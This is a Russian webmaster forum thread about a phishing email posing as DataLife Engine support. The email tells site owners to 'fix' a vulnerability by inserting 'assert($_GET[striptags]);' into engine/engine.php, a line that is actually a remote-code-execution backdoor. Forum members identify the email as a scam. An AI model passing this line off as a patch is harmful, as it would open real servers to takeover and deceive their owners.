- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Данное письмо вам отправил support@dle-news.ru с сайта сайт.ру
------------------------------------------------
Текст сообщения
------------------------------------------------
Уважаемые владельцы сайта сайт.ру!
Благодарим Вас за использование на Вашем сайте сайт.ру CMS «DataLife Engine».
Сообщаем Вам о том, что за последние сутки в код Вашего сайта сайт.ру был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.
Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.
При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.
Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.
Для исправления откройте файл: сайт.ру/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:
assert($_GET[striptags]);
С уважением,
Команда «DataLife Engine»
IP адрес отправителя: 78.47.58.6
------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма
С уважением,
Администрация сайт.ру
Злоумышленники? почему почта как у поддержки движка?
1. Спам обсуждать запрещено
2. Нету там почты как у поддержки
3. Разбирайтесь в заголовках письма
/ru/forum/882375
время от времени текст и вредоносный код меняется, а люди по прежнему верят...
Конечно вообще сидеть на форуме поисковых систем не уметь пользоваться гуглом, это моветон уже:
https://www.google.ru/search?client=opera&q=Для+исправления+откройте+файл%3A+сайт.ру%2Fengine%2Fengine.php+и+в+самое+начало+файла+после+строчки+<%3FPHP+добавьте%3A&sourceid=opera&ie=UTF-8&oe=UTF-8
Ясно-понятно спасибо.
Такое самое сегодня пришло
Конечно вообще сидеть на форуме поисковых систем не уметь пользоваться гуглом, это моветон уже:
проще тут отписать итог, чем ссылаться на на другие форумы, сайты. - и там что-то уловить.
LEOnidUKG - люди же спросили тут,. и видимо письмецо как и мне (на пару сайтов) пришло всем.
Ды.. мы "умные" и все понимаем..но тут много человек, которые не понимают....
Итог: это развод, не обращайте внимания